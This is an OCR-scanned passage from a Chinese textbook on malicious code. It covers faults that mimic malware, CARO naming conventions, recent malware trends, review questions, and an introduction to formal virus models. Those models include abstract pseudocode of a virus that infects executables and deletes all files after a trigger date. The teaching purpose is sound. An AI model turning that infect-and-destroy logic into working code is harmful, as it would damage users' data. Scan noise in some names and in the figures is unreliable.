用 户 如 果 使 用 质量 低劣 的 磁 ( 光 ) 盘 或 使 用 损坏 的 发霉 的 磁 ( 光 ) 盘 ,会 把 驱动 器 和 弄 脏 ， 
出 现 无 法 读 写 磁 ( 光 ) 盘 或 读 写 出 错 等 故障 。 遇 到 这 种 情况 时 ,只 需 用 清洗 盘 清 洗 读 写 头 , 即 
可 排除 故障 。 

5. CMOS 的 问题 

CMOS 存储 的 信息 对 计算 机 系统 来 说 是 十 分 重要 的 。 在 计算 机 启动 时 总 是 先 按 
CMOS 中 的 信息 来 检测 和 初始 化 系统 。 在 较 旧 的 主板 中 ,大 都 有 一 个 病毒 监测 开关 ,用 户 
一 般 情况 下 都 设置 为 ON, 这 时 如 果 安 装 某 些 系 统 , 就 会 发 生死 机 现象 。 用 户 在 安装 新 系统 
时 ,应 先 把 CMOS 中 病毒 监测 开关 设 为 “OFF”。 另 外 ,系统 的 引导 速度 和 一 些 程序 的 运行 
速度 减 慢 也 可 能 与 CMOS 有 关 , 因 为 CMOS 的 高 级 设置 中 有 一 些 影子 内 存 开关 ,这 些 也 会 
影响 系统 的 运行 速度 。 


1.6.3 与 恶意 代码 现象 类 似 的 软件 故障 


软件 故障 的 范围 比较 广泛 ,问题 出 现 也 比较 多 ,所 以 诊断 就 非常 困难 。 对 软件 故障 的 辩 
认 和 修复 是 一 件 很 难 的 事情 ,需要 用 户 具 备 足 够 的 软件 知识 和 丰富 的 计算 机 使 用 经 验 。 这 
里 介绍 一 些 常 见 的 软件 故障 症状 。 

1. 软件 程序 已 被 破坏 

由 于 磁 ( 光 ) 盘 质量 等 问题 ,文件 的 数据 部 分 丢失 ,而 程序 仍 能 运行 ,但 这 时 继续 执行 该 
程序 就 会 出 现 不 正常 现象 。 例 如 ,Format 程序 被 破坏 后 , 若 继续 执行 ,会 格式 化 出 非 标准 格 
式 的 磁盘 ,进而 产生 一 连 串 的 错误 。 
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2. 软件 与 操作 系统 不 兼容 

由 于 操作 系统 自身 的 特点 ,使 软件 过 多 地 受 其 环境 的 限制 ,在 某 个 操作 系统 下 可 正常 运 
行 的 软件 ,到 另 一 个 系统 下 却 不 能 正常 运行 ,许多 用 户 就 怀疑 是 由 恶意 代码 引起 的 。 例 如 ， 
32 位 系统 下 正常 运行 的 程序 ,复制 到 64 位 系统 后 ,一般 都 不 能 正常 运行 。 

3. 引导 过 程 故障 

系统 引导 时 屏幕 显示 “Missing operating system”( 操 作 系统 丢失 ) ,故障 原因 是 硬盘 的 
主 引导 程序 可 完成 引导 ,但 无 法 找到 系统 的 引导 记录 。 

4. 使 用 不 同 的 编辑 软件 导致 错误 

用 户 用 一 些 编辑 软件 编辑 源 程序 时 ,编辑 系统 会 在 文件 的 特殊 地 方 做 上 一 些 标记 。 这 
样 当 源 程 序 编 译 或 解释 执行 时 就 会 出 错 。 

在 学 习 、 使 用 计算 机 的 过 程 中 ,可 能 还 会 遇 到 许 许多 多 与 恶意 代码 现象 相似 的 软 硬 件 故 
障 , 所 以 用 户 要 多 阅读 、 参 考 有 关 资 料 , 了 解 恶 意 代码 的 特征 ,并 注意 在 学 习 、 工 作 中 积累 经 
验 , 就 不 难 区 分 恶意 代码 现象 与 软件 故障 、 硬 件 故障 现象 了 。 


1.7 恶意 代码 的 命名 规则 


由 于 没有 一 个 专门 的 机 构 负责 给 恶意 代码 命名 ,因此 ,恶意 代码 的 名 称 很 不 一 致 。 恶 意 
代码 的 传播 性 意味 着 它们 可 能 同时 出 现在 多 个 地 点 或 者 同时 被 多 个 研究 者 发 现 。 这 些 研究 
者 更 关心 的 是 如 何 增强 他 们 产品 的 性 能 使 其 能 对 付 最 新 出 现 的 恶意 代码 ,而 并 不 关心 是 否 
应 该 给 这 个 恶意 代码 定义 一 个 世界 公认 的 名 称 。 第 一 个 IBM PC 上 的 病毒 一 一 巴基斯坦 脑 
病毒 ,也 被 称 为 脑病 毒 、 项 童 病毒 、 克 隆 病 毒 或 土 牢 病毒 。Happy99 里 虫 是 一 种 攻击 代码 ， 
也 被 称 为 Ska 或 Worm。 由 此 可 见 , 一 种 恶意 代码 有 多 个 名 称 是 非常 普遍 的 事情 ,如 果 只 
有 一 个 名 称 反而 显得 不 太 正 常 了 。 在 这 些 名 称 中 ,最 常用 的 名 称 往往 被 称 为 正式 名 称 , 而 其 
他 名 称 都 是 别名 。 这 种 命名 的 不 一 致使 得 人 们 讨论 起 来 非常 困难 ,因为 多 个 名 称 让 人 和 弄 不 
清 究 竞 指 的 是 哪个 恶意 代码 。 

在 恶意 代码 出 现 的 初期 ,大 多 数 恶 意 代 码 是 以 代码 中 发 现 的 文字 字符 来 命名 的 。 有 时 ， 
恶意 代码 也 以 发 现 地 点 来 命名 ,但 这 会 使 得 恶意 代码 的 名 称 与 其 原 产 地 不 一 致 。 例 如 , 耶 路 
撤 冷 病毒 原 产 地 是 意大利 ,但 却 在 希 伯 伦 大 学 首次 被 发 现 。 有 些 恶 意 代 码 是 以 其 作者 的 名 
字 来 命名 的 。 例 如 ,黑色 复仇 者 病毒 ,但 是 这 样 的 命名 方式 使 得 恶意 代码 作者 能 得 到 媒体 不 
应 有 的 注意 。 因 此 ,为 了 出 名 , 越 来 越 多 的 人 成 了 恶意 代码 制造 者 。 有 一 段 时 间 , 研 究 者 用 
一 串 随机 的 序列 号 或 代码 中 出 现 的 数字 来 命名 , 像 1302 病毒 。 这 种 方式 避免 了 恶意 代码 作 
者 在 媒体 上 获悉 他 的 作品 的 消息 ,但 这 同样 也 给 研究 者 和 非 研究 者 带 来 了 不 便 。 

1991 年 ,计算 机 反 病 毒 研究 组 织 (Computer Antivirus Researchers Organization ， 
CARO) 的 一 些 资深 成 员 提 出 了 一 套 被 称 为 CARO 命名 规则 的 标准 命名 模式 。 虽 然 CARO 
并 不 实际 命名 ,但 它 提出 了 一 系列 命名 规则 来 帮助 研究 者 给 恶意 代码 命名 。 根 据 CARO 命 
名 规则 ,每 一 种 恶意 代码 的 命名 包括 5 个 部 分 。 

(1) 家 族 名 。 

(2) 组 名 。 
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(3) 大 变种 。 

(4) 小 变种 。 

(5) 修改 者 。 

CARO 规则 的 一 些 附加 规则 包括 以 下 内 容 。 

(1) 不 用 地 点 命名 。 

(2) 不 用 公司 或 商标 命名 。 

(3) 如 果 已 经 有 了 名 称 就 不 再 另 定义 别名 。 

(4) 变种 是 子 类 。 

例如 ,精灵 (Cunning) 病 毒 是 瀑布 (Cascade) 病 毒 的 变种 , 它 在 发 作 时 能 奏 乐 ,因此 被 命 
名 为 Cascade. 1701. A。Cascade 是 家 族 名 ,1701 是 组 名 。 因 为 Cascade 病毒 的 变种 大 小 不 
一 (如 1701、1704、1621 等 ), 所 以 用 该 值 来 表示 组 名 。A 表示 该 病毒 是 某 个 组 中 的 第 一 个 变 
种 。 耶 路 撤 冷 圣 论 病 毒 则 被 命名 为 Jerusalem. 1808. Apocalypse。 

虽然 关于 恶意 代码 命名 的 会 议 对 统一 命名 提供 了 帮助 ,但 是 由 于 感染 恶意 代码 的 途径 
非常 多 ,因此 反 病 毒 软 件 商 们 通常 在 CARO 命名 的 前 面 加 一 个 前 级 来 标明 病毒 类 型 。 例 
如 ,WM 表示 MS Word 宏 病 毒 , Win32 指 32 位 Windows 病毒 ,VBS 指 VB 恶意 脚本 。 这 
样 ,美丽 莎 病毒 的 一 个 变种 的 命名 就 成 了 W97M. Melissa. AA, Happy99 蠕虫 就 被 称 为 
Win32. Happy99. Worm ,而 一 种 VB 恶意 脚本 FreeLinks 就 成 了 VBS. FreeLinks。 表 1-1 
列 出 了 反 病 毒 厂 商 们 常用 的 恶意 代码 名 称 前 级 。 


表 1-1 恶意 代码 名 称 前 缀 


前 缀 描 述 
AM Access 宏 病 毒 
AOL 专门 针对 美国 在 线 的 恶意 传播 代码 
Backdoor 后 门 病毒 
BAT 用 DOS 的 批 处 理 语句 编写 的 病毒 
Boot DOS 引导 区 型 病毒 
HIL 用 高 级 语言 编写 的 蠕虫 .木马 
HACK 黑客 病毒 
JAVA 用 Java 编写 的 恶意 代码 
JS 用 JavaScript 写 的 恶意 脚本 
PWSTEAL 盗 取 口令 的 木马 
SCRIPT 脚本 病毒 
TRO 一 般 木 马 
VBS Visual Basic 恶意 脚本 或 蠕虫 
W32/WIN32 所 有 可 以 感染 32 位 平台 的 32 位 恶意 代码 
W95/W98/W9X Windows 9x 和 Windows Me 恶意 代码 
WIN/WIN16 Windows 3. x 专 有 恶意 代码 
WM Word 宏 病 毒 
WNT/WINNT Windows NT 专 有 恶意 代码 
W2K Windows 2000 恶意 代码 
XF Excel 公式 恶意 代码 
XM Excel 宏 病毒 
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例如 ,W95. CIH 这 个 名 称 表明 , 它 是 利用 Windows 95 API 编写 而 成 的 。CIH 病毒 在 
Windows 9x 和 Windows NT 平台 上 进行 传播 .但 是 不 会 对 Windows NT 系统 产生 危害 。 

VGrep 是 各 大 厂商 对 恶意 代码 命名 方式 的 一 种 新 尝试 。 这 种 方法 将 已 知 的 恶意 代码 
名 称 通 过 某 种 方法 关联 起 来 ,其 目的 是 不 管 什么 样 的 扫描 软件 都 能 按照 可 被 识别 的 名 称 链 
进行 扫描 。VGrep 将 恶意 代码 文件 读 入 并 用 不 同 的 扫描 器 进行 扫描 ,扫描 的 结果 和 被 识别 
出 的 信息 放 入 数据 库 中 。 对 每 种 扫描 器 的 扫描 结果 进行 比较 ,并 将 结果 用 作 病 毒 名 交叉 引 
用 表 。VGrep 的 参与 者 赞同 为 每 一 种 恶意 代码 命名 一 个 最 通用 的 名 称 , 采 用 VGrep 命名 方 
式 将 对 在 世界 范围 内 跟踪 多 个 恶意 代码 的 一 致 性 很 有 帮助 。 


1.8 恶意 代码 的 最 新 趋势 


在 恶意 代码 的 发 展 史 上 ,恶意 代码 的 出 现 是 有 规律 的 。 一 般 情况 下 ,一 种 新 的 恶意 代码 
技术 出 现 后 ,采用 新 技术 的 恶意 代码 会 迅速 发 展 ,接着 反 恶 意 代码 技术 的 发 展会 抑制 其 流 
传 。 操 作 系 统 进行 升级 时 ,恶意 代码 也 会 调整 为 新 的 方式 ,产生 新 的 攻击 技术 。 恶 意 代 码 的 
发 展 趋势 是 和 信息 技术 的 发 展 相关 的 。 

就 近 几 年 的 恶意 代码 来 看 ,当前 的 恶意 代码 发 展 趋势 如 下 。 

1. 网 络 化 发 展 

新 时 期 的 恶意 代码 充分 利用 计算 机 技术 和 网 络 技术 。2000 年 以 后 ,通过 网 络 漏洞 和 邮 
件 系统 进行 传播 的 蠕虫 成 为 "新宠 ”, 数 量 上 已 经 远 远 超 过 了 曾经 是 主流 的 文件 型 病毒 。 在 
2003 一 2004 年 的 流行 恶意 代码 列表 中 ,有 一 半 以 上 是 蠕虫 。2005 年 以 来 ,木马 成 为 最 流行 
的 恶意 代码 。 得 益 于 国内 安全 浏览 器 的 普及 和 第 三 方 打 补丁 工具 的 普及 ,2010 年 以 来 , 针 
对 国内 用 户 的 挂 马 攻 击 的 事件 呈现 持续 大 幅 下 降 的 趋势 ,但 2015 年 以 来 ,网 页 挂 马 攻 击 在 
国内 又 开始 重新 流行 ,并 呈现 一 定 程 度 的 爆发 趋势 ,甚至 出 现 运 营 商 被 挂 马 的 安全 事件 。 说 
明 在 网 络 技术 发 展 的 同时 ,网 络 安全 防御 措施 未 及 时 跟 上 ,网 络 防毒 将 成 为 今后 网 络 管理 工 
作 的 重点 。 

2. 专业 化 发 展 

2003 年 ,媒体 报道 发 现 了 第 一 例 感 染 手 机 的 恶意 代码 ,由 于 当时 手机 设备 采用 和 能 入 式 
操作 系统 并 且 软 件 接口 较 少 ,以 往 很 少 有 恶意 代码 制造 者 涉足 这 个 领域 。 同 时 ,2001 年 以 
来 针对 工业 控制 系统 (ICS) 的 病毒 .木马 等 攻击 行为 也 大 幅 增长 : 2007 年 ,攻击 者 入 侵 加 拿 
大 一 个 水 利 SCADA 控制 系统 ,破坏 了 取水 调度 的 控制 计算 机 ; 2008 年 ,攻击 者 入 侵 波 兰 某 
城市 地 铁 系统 ,通过 电视 遥控 器 改变 轨道 扳 道 器 , 致 四 节 车 厢 脱 轨 ; 2010 年 ,出 现 了 专门 攻 
击 西门 子 工业 控制 系统 的 Stuxnet 病毒 ,也 称 为 震 网 病毒 。2011 年 ,微软 发 现 的 Duqu 病毒 
可 从 工业 控制 系统 制造 商 收集 情报 数据 。2012 年 5 月 被 发 现 的 计算 机 病毒 一 一 Flame 火 
焰 病 毒 被 定性 为 “工业 病毒 ”, 它 构造 复杂 ,可 以 通过 USB 存储 器 以 及 网 络 复制 和 传播 ,并 能 
接收 来 自 世界 各 地 多 个 服务 器 的 指令 。IBM 安全 管理 服务 (MSS) 数 据 显 示 ,截至 2016 年 
11 月 30 日 ,针对 工业 控制 系统 的 攻击 数量 比 2015 年 增长 了 110%。2017 年 11 月 ,一 款 针 
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对 ICS 量 身 定做 的 恶意 软件 一 一 TRISIS( 又 称 为 TRITON) 被 发 现 , 它 将 目标 锁定 在 施耐德 
电气 的 Triconex 安全 仪表 控制 系统 (SIS) ,从 而 能 够 更 换 最 终 控 制 元 素 中 的 逻辑 。 

3. 简单 化 发 展 

与 传统 计算 机 病毒 不 同 的 是 ,许多 恶意 代码 是 利用 当前 最 新 的 编程 语言 与 编程 技术 来 
实现 的 ,它们 易于 修改 以 产生 新 的 变种 ,从 而 避 开 安全 防范 软件 的 搜索 。 例 如 ,“ 爱 虫 ” 是 用 
VBScript 语言 编写 的 ,只 要 通过 Windows 自 带 的 编辑 软件 修改 恶意 代码 中 的 一 部 分 ,就 能 
轻而易举 地 制造 出 新 变种 ,以 躲避 安全 防范 软件 的 追击 。 

不 法 分 子 甚至 还 提供 了 一 些 工 具 包 ,进一步 降低 了 利用 恶意 代码 进行 攻击 的 入 门 门槛 。 
如 2010 年 被 首次 发 现 的 Blackhole 就 是 一 个 恶意 程序 工具 包 , 可 以 被 添加 到 恶意 的 或 被 攻 
击 的 网 站 中 ,然后 利用 各 种 各 样 的 浏览 器 漏洞 ,按照 客户 的 要 求 安 装 指定 的 恶意 软件 。 多 年 
来 ,Blackhole 是 造成 大 部 分 恶意 软件 感染 和 银行 凭证 被 盗 的 罪魁 祸首 。2017 年 肆虐 一 时 
的 WannaCry、Petya 等 勒索 病毒 及 其 变种 都 是 通过 之 前 泄露 的 NSA 黑客 攻击 工具 ,利用 系 
统 漏洞 在 网 络 上 快速 传播 的 。 

4. 多 样 化 发 展 

新 恶意 代码 可 以 是 可 执行 程序 .脚本 文件 .HTML 网 页 等 多 种 形式 ,并 正 向 电子 邮件 、 
网 上 贺卡 .卡通 图 片 . 即 时 信息 等 发 展 。2016 年 ,在 钓鱼 邮件 中 使 用 脚本 附件 是 恶意 代码 传 
播 方法 的 最 大 改变 之 一 。 这 些 脚 本 通常 驻 留 在 压缩 文件 中 ,一 旦 打开 并 触发 了 它们 ,它们 会 
访问 远程 服务 器 ,并 在 系统 中 下 载 和 安装 恶意 软件 。 

5. 自动 化 发 展 

以 前 的 恶意 代码 制作 者 都 是 专家 ,编写 恶意 代码 在 于 表现 自己 高 超 的 技术 。 但 是 “ 库 尔 
尼 科 娃 ” 病 毒 的 设计 者 不 同 ,他 只 是 下 载 了 VBS 蠕虫 镶 化 器 并 加 以 使 用 ,该 恶意 代码 就 诞生 
了 。 据 报道 ,VBS 蠕虫 钱 化 器 被 人 们 从 VXHeavens 上 下 载 了 15 万 次 以 上 。 正 是 由 于 这 类 
工具 太 容 易 得 到 ,使 得 现在 新 恶意 代码 出 现 的 频率 超出 以 往 任 何 时 候 。 迄 今 为 止 ,常见 的 病 
毒 机 包括 VCS(Virus Construction Set, 病毒 构造 工具 箱 ) .GenVir、VCL(Virus Creation 
Laboratory ,病毒 制造 实验 室 )、PS-MPC(Phalcon-Skism Mass-Produced Code Generator) 、 
NGVCK(Next Generation Virus Creation Kit, 下 一 代 病 毒 机 )、VBS 蠕虫 孵化 器 等 。 

6. 犯罪 化 发 展 

卡巴 斯 基 实 验 室 的 David Emm 指出 ,恶意 代码 的 发 展 目标 ,已 经 从 原来 单纯 的 恶意 玩 
笑 或 者 破坏 ,演变 为 有 组 织 的 、 受 利益 驱使 的 .分 工 明确 的 网 络 犯罪 行为 。 网 络 犯罪 已 逐渐 
向 国际 化 和 集团 化 发 展 , 他 们 通过 盗用 身份 以 及 诈骗 .勒索 .非法 广告 和 虚拟 财产 盗窃 .僵尸 
网 络 等 手段 获取 经 济 利 益 。 针 对 网 络 犯罪 的 发 展 ,David 认为 它 已 经 发 展 成 为 一 种 产业 ,并 
已 经 形成 了 一 个 分 工 明 细 、 精 确 的 产业 链条 (图 1-1) 。 

TrendLabs 在 《2017 年 度 安全 报告 ) 中 指出 ,在 中 东 及 北非 一 带 已 经 形成 了 Malware- 
as-a-Service (MaaS) 的 交易 市 场 。 

McAffe 的 James Lewis 指出 ,网 络 犯罪 正在 损害 全 球 经 济 ,2017 年 度 网 络 犯 罪 对 全 球 
造成 了 接近 6000 亿美 元 的 损失 ,是 全 球 GDP 的 0.8%。 
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图 1-1 恶意 代码 的 集团 化 发 展 ( 卡 巴 斯 基 实验 室 ) 
1.9 习 题 
简 答 题 
1. 在 理解 恶意 代码 和 计算 机 病毒 二 者 异同 点 的 基础 上 ,说 明 为 什么 需要 引入 恶意 代码 
的 概念 ? 


2. 恶意 代码 的 定义 是 什么 ?列举 尽 可 能 多 的 恶意 代码 种 类 。 

. 当前 ,恶意 代码 表现 出 什么 样 的 发 展 趋势 ? 

. 仔细 阅读 恶意 代码 的 发 展 历史 ,并 列举 其 中 重要 的 关键 环节 。 

. 根据 恶意 代码 命名 规则 ,解读 “Win32. Happy99. Worm” 的 含义 。 


nw 
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对 恶意 代码 理论 模型 的 研究 分 为 制作 模型 的 研究 和 防范 模型 的 研究 。 依 据 恶 意 代码 发 
展 的 轨迹 ,研究 者 最 先 用 形式 化 的 数学 方法 描述 传统 计算 机 病毒 的 理论 模型 。1987 年 ， 
Fred Cohen 开始 了 传统 计算 机 病毒 的 学 术 研 究 , 他 定义 了 一 个 抽象 计算 机 病毒 ,并 证 明了 
计算 机 病毒 检测 的 不 确定 性 ,指出 没有 对 付 计算 机 病毒 的 万 能 药 。Cohen 理论 的 最 大 贡献 
是 证 明了 计算 机 病毒 的 不 确定 性 。Ferenc 提出 了 基于 图 灵机 模型 的 计算 机 病毒 理论 ,该 理 
论 非常 适合 探讨 病毒 和 现 有 计算 机 体系 之 间 的 关系 。Adleman 另辟蹊径 ,提出 了 基于 递归 
函数 的 计算 机 病毒 理论 。 本 章 将 详细 介绍 计算 机 病毒 的 各 种 理论 模型 ,例如 ,基于 图 灵机 的 
计算 机 病毒 的 计算 模型 .基于 递归 函数 的 计算 机 病毒 的 数学 模型 和 Internet 中 的 蠕虫 传播 
模型 。 这 些 模型 有 利于 进一步 深入 理解 恶意 代码 .研究 恶意 代码 的 工作 机 制 。 

本 章 学 习 目 标 

(1) 掌握 传统 计算 机 病毒 的 抽象 描述 。 

(2) 掌握 基于 图 灵机 的 计算 机 病毒 模型 。 

(3) 了 解 基于 递归 函数 的 计算 机 病毒 模型 。 

(4) 掌握 网 络 蠕虫 传播 模型 。 

掌握 恶意 代码 的 预防 理论 模型 。 

(6) 掌握 恶意 代码 的 程序 结构 。 


2.1 基本 定义 


为 了 说 明 本 节 后 面 的 问题 ,此 处 给 出 一 个 虚拟 案例 。 

一 个 文本 编辑 程序 被 传统 计算 机 病毒 感染 了 。 每 当 使 用 文本 编辑 程序 时 , 它 总 是 先进 
行 感染 工作 并 执行 编辑 任务 ,其 间 , 它 将 搜索 合适 文件 以 进行 感染 。 每 一 个 新 被 感染 的 程序 
都 将 执行 原 有 的 任务 ,并 且 也 搜索 合适 的 程序 进行 感染 ,这 种 过 程 反复 进行 。 当 这 些 被 感染 
的 程序 跨 系 统 传播 ,被 销售 ,或 者 送 给 其 他 人 时 ,将 产生 病毒 扩散 的 新 机 会 。 最 终 , 在 1990 
年 1 月 1 日 以 后 ,被 感染 的 程序 终止 了 先前 的 活动 。 现 在 ,每 当 这 样 的 一 个 程序 执行 时 , 它 
将 删除 所 有 文件 。 

这 样 的 一 个 传统 计算 机 病毒 可 用 伪 代 码 表示 如 下 。 


{main: = 
Call injure; 
Call submain; 


Call infect; 
} 


{injure: = 
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If condition then whatever damage is to be done and halt; 


{infect: 


If condition then infect files; 


} 


对 于 上 面 的 案例 而 言 ,病毒 的 伪 代 码 表示 为 : 


{main: = 

Call injure; 

Call submain; 

Call infect; 

: 

{injure: = 

If date>= Jan. 1,1990 then 


While file!= 0 


File = get— random— file; 
Delete file; 


Halt; 


上 


{infect: 


If true then 

File = get~ random— executable— file; 
Rename main routine submain; 

Prepend self to file; 


通过 改变 上 述 伪 代码 ,可 以 产生 很 多 种 不 同 的 病毒 ,甚至 可 以 产生 有 益 的 病毒 。 下 面 的 
伪 代 码 是 经 过 微小 改变 而 形成 的 压缩 病毒 ,这 种 病毒 可 以 节省 存储 空间 。 


{main: = 


Call injure; 

Decompress compressed part of program; 
Call submain; 

Call infect; 


} 
{injure: 
If false 


then halt; 


{infect: = 
If executable != 0 then 
File = get— random— executable— file; 


Rename 
Compre: 


main routine submain; 
SS file; 


Prepend self to file; 


. 


综观 上 述 3 种 病毒 伪 代 码 ,非常 明显 ,有 如 下 一 些 相关 性 质 。 


(1) 对 村 


F 每 个 程序 ,都 存在 该 程序 相应 的 感染 形式 。 即 可 以 把 病毒 看 作 是 一 个 程序 到 


一 个 被 感染 程序 的 映射 。 
(2) 每 一 个 被 感染 程序 在 每 个 输入 (这 里 的 输入 是 指 可 访问 信息 ,如 用 户 输 入 系统 时 
钟 数据 或 程序 文件 等 ) 上 形成 如 下 3 个 选择 。 
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@ 破坏 (Injure) : 不 执行 原先 的 功能 ,而 去 完成 其 他 功能 。 任 何 一 种 输入 导致 破坏 以 
及 破坏 的 形式 都 与 被 感染 的 程序 无 关 , 而 只 与 病毒 本 身 有 关 。 

加 传染 (Infect) : 执行 原先 的 功能 ,并 且 如 果 程 序 能 终止 , 则 传染 程序 。 对 于 除 程序 以 
外 的 其 他 可 访问 信息 (如 时 钟 , 用 户 / 程 序 间 的 通信 ?的 处 理 , 同 感染 前 的 源 程序 一 样 。 另 外 ， 
不 管 被 感染 的 程序 其 原先 功能 如 何 ( 文 本 编辑 或 编译 器 等 ) , 当 它 传染 其 他 程序 时 ,其 结果 是 
一 样 的 。 也 就 是 说 ,一 个 程序 被 感染 的 形式 与 感染 它 的 程序 无 关 。 

@ 模仿 (Imitate) : 既 不 破坏 也 不 传染 ,不 加 修改 地 执行 原先 的 功能 。 这 也 可 看 作 是 传 
染 的 一 个 特例 ,其 中 被 传染 的 程序 个 数 为 零 。 


2.2 基于 图 灵机 的 传统 计算 机 病毒 模型 


在 实际 计算 机 环境 中 ,特定 程序 间 的 连接 主要 靠 操作 系统 来 管理 。 多 数 操作 系统 中 的 
程序 是 可 以 修改 其 他 程序 或 数据 文件 的 。 例 如 ,一 些 特殊 程序 (如 计算 机 病毒 ) 就 利用 了 操 
作 系 统 的 这 种 便利 特性 。 为 了 分 析 这 些 能 够 修改 其 他 程序 的 程序 ,定义 了 一 个 新 的 计算 机 
模型 。 这 个 新 引进 的 数学 模型 称 为 带 后 台 存 储 器 随机 访问 存储 程序 计算 机 (Random 
Access Stored Program Machine with Attached Background Storage, RASPM_ABS)., 

本 节 介 绍 新 模型 中 用 到 的 随机 访问 计算 机 、 随 机 访问 存储 程序 计算 机 以 及 图 灵机 的 重 
要 特征 ,同时 表明 这 些 模型 是 很 适用 的 ,它们 不 但 可 以 产生 分 析 结果 ,而 且 能 够 精确 地 反映 
真实 计算 机 的 显著 特征 。 


2.2.1 随机 访问 计算 机 模型 


1946 年 2 月 14 日 ,世界 上 第 一 台电 子 数字 积分 计算 机 ENIAC(Electronic Numerical 
Integrator and Calculator) 在 美国 宾夕法尼亚 大 学 诞生 。ENIAC 完全 符合 RAM 模型 ,是 
一 款 不 能 被 病毒 感染 的 电子 计算 机 。ENIAC 百 毒 不 侵 的 原因 在 于 随机 访问 计算 机 
(Random Access Machine,RAM) 模 型 是 一 种 带 有 累加 器 的 计算 机 模型 ,并 且 在 该 模型 中 指 
令 不 能 自我 修改 。RAM 由 一 个 只 读 输 入 带 、 只 写 输出 带 以 及 一 个 程序 和 一 台 存 储 器 所 构 
成 ,如 图 2-1 所 示 。 


W|I i 和 
输入 带 
[】 
程序 (不 能 ro 
存储 在 存 | 控制 单元 二 
储 器 中 ) 中 | 存储 器 
LE 
1 
为 | 为 
输出 带 


2-1 随机 访问 计算 机 (RAM) 模 型 
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RAM 模型 的 程序 不 仅 可 以 从 输入 带 上 读 取 数据 ,并 将 结果 数据 写 到 输出 带 上 ,而 且 它 
还 能 读 或 修改 存储 器 单元 的 内 容 。 输 入 带 是 逻辑 单元 序列 ,每 个 逻辑 单元 中 都 有 一 个 整数 。 
带头 在 输入 带 上 读 取 到 一 个 符号 后 ,就 会 向 右 移动 一 个 逻辑 单元 。 输 出 带 是 一 个 包含 迎 辑 
单元 的 只 写 带 ,只 不 过 这 些 逻 辑 单元 开始 都 是 空白 的 。 当 开始 执行 写 指令 时 ,就 会 向 当前 带 
头 所 指向 的 逻辑 单元 中 输入 一 个 整数 ,并 且 带 头 也 会 向 右 移动 一 位 。 这 就 意味 着 输入 字符 
只 能 被 读 取 一 次 ,而且 一 旦 输出 字符 写 到 输出 带 上 ,就 不 能 再 改变 。 

由 于 RAM 模型 的 程序 并 不 是 存储 在 存储 器 中 的 ,所 以 必须 明确 该 模型 的 程序 是 不 能 
自我 修改 的 , 它 仅 仅 是 一 个 指令 序列 。 每 条 指令 包含 两 个 部 分 : 操作 码 和 地 址 。 假 设 操 作 
码 是 用 来 识别 算术 符号 、 处 理 输入 和 输出 带 的 指令 。 指 令 地 址 是 识别 程序 中 其 他 指令 所 在 
位 置 的 标号 ,该 标号 通常 被 用 在 指令 流 中 。 其 他 指令 的 地 址 可 能 是 一 个 操作 数 ,或 者 能 够 被 
忽略 掉 。 表 2-1 是 RAM 模型 的 典型 指令 集 。 原 则 上 ,可 以 不 改变 问题 的 复杂 度 ,而 以 当今 
计算 机 中 的 指令 (如 逻辑 和 字符 指令 ) 来 探讨 RAM 模型 的 指令 集合 。 因 此 , 表 中 RAM 模 
型 指令 的 精确 含义 并 不 重要 。 

表 2-1 随机 访问 计算 机 (RAM) 的 指令 集 


指令 参数 指令 含义 
LOAD 操作 数 将 操作 数 指定 的 值 装 入 累加 器 
STORE 操作 数 将 存储 在 累加 器 中 的 值 复制 到 操作 数 指定 的 单元 中 
ADD 操作 数 将 操作 数 指定 的 值 加 到 累加 器 中 
SUB 操作 数 从 累加 器 中 减 去 操作 数 指定 的 值 
MULT 操作 数 用 操作 数 指定 的 值 与 累加 器 中 的 值 相 乘 
DIV 操作 数 用 操作 数 指定 的 值 除 以 累加 器 中 的 值 
READ 操作 数 将 输入 带 上 的 值 读 入 操作 数 指定 的 单元 中 
WRITE 操作 数 将 操作 数 指定 的 值 写 到 输出 带 上 
JUMP 标号 修改 指令 指针 使 其 指向 标号 所 指定 的 值 
JGTZ 标号 如 果 累 加 器 中 的 值 为 正 , 那 么 修改 指令 指针 指向 标号 所 指定 的 值 
JZERO 标号 如 果 累 加 器 中 的 值 为 零 ,那么 修改 指令 指针 指向 标号 所 指定 的 值 
HALT 一 停机 


指令 中 的 操作 数 可 能 是 以 下 几 种 形式 之 一 。 

(1) i: 表示 整数 i 本身 。 

(2) [ 门 : 表示 寄存 器 i 的 内 容 , 其 中 i 是 正 整 数 。 

(3) [[ 门 ]: 表示 间接 寻 址 ,寄存 器 i 内 容 中 的 内 容 。 也 就 是 说 ,操作 数 是 寄存 器 j 的 内 
容 , 而 j 是 在 寄存 器 i 中 发 现 的 整数 。 如 果 j 二 0, 则 停机 。 

在 初始 阶段 ,所 有 的 寄存 器 都 将 被 置 为 0, 并 使 指令 指针 指向 P 的 第 一 条 指令 ,而 且 输 
出 带 是 空白 的 。 在 完成 已 的 第 & 条 指令 后 ,除非 第 & 条 指令 是 JUMP、HALT、JGTZ 或 
JZER0 ,和 否则 指令 指针 就 会 自动 地 指向 第 (& 十 1) 条 指令 。 遇 到 HALT 指令 ,计算 机 将 停止 
运行 。 执 行 到 JUMP 指令 .或 者 当 JGTZ 或 JZERO 指令 的 条 件 满足 时 ,指令 指针 将 指向 分 
支 标号 所 指定 的 值 。 


2.2.2 随机 访问 存储 程序 模型 


在 RAM 模型 中 ,因为 程序 并 不 是 存储 在 存储 器 中 的 ,所 以 它 不 能 自我 修改 ,因此 ,也 不 
可 能 被 计算 机 病毒 感染 。 现 在 ,来 考虑 计算 机 的 另 一 种 被 称 为 随机 访问 存储 程序 的 计算 机 
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(Random Access Stored Program Machine, RASPM) 模 型 。 除 了 程序 能 存储 在 存储 器 中 
外 ,该 模型 具有 RAM 模型 的 所 有 特性 ,并 且 RASPM 程序 能 够 自我 修改 ,如 图 2-2 所 示 。 
RASPM 不 需要 间接 寻 址 (因为 程序 可 以 修改 自身 ,所 以 间接 寻 址 可 以 被 仿真 )。 


EE | 南 
输入 带 
4 
程序 (能 存 i 
储 在 存储 控制 单元 尖 
器 中 ) 方 | 存储 器 
rs 


输出 带 
图 2-2 随机 访问 存储 计算 机 (RASPM) 模 型 


RAM 程序 与 RASPM 程序 的 计算 复杂 度 存在 常数 倍数 关系 。 也 就 是 说 ,如 果 某 个 问 
题 在 RAM 上 执行 需要 的 时 间 复 杂 度 为 (nn) ,那么 它 在 RASPM 上 运行 所 需 的 时 间 复 杂 度 
就 是 &T(n) ,其 中 人 为 常数 。 

定理 2.1 如 果 指 令 的 花费 是 一 致 的 或 者 对 数 的 ,那么 对 所 有 时 间 复 杂 度 为 T(z) 的 
